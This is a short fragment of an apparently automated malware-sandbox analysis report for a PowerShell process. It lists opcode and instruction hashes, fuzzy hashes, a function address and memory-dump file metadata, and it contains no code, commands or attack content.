                                                                                                        • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                        • Instruction ID: ee203fa430673b151c158903ab8536e159a1fff382111c01afdc2646a1e8baba
                                                                                                        • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                        • Instruction Fuzzy Hash: 1411AB72A28AC287E7606F64E844B77FA90FB95B45FC49132D68A469C4DF3CD448CB11

                                                                                                        Executed Functions

                                                                                                        Function 00007FFAAC4437B5 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.1892400896.00007FFAAC440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC440000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ffaac440000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                        • Instruction ID: 39c2d45f030bbd8e0f6522fcde3179c4b25a012a28dbc5aa610eb032179fb1be
                                                                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                        • Instruction Fuzzy Hash: 9501677111CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3665D636E882CB45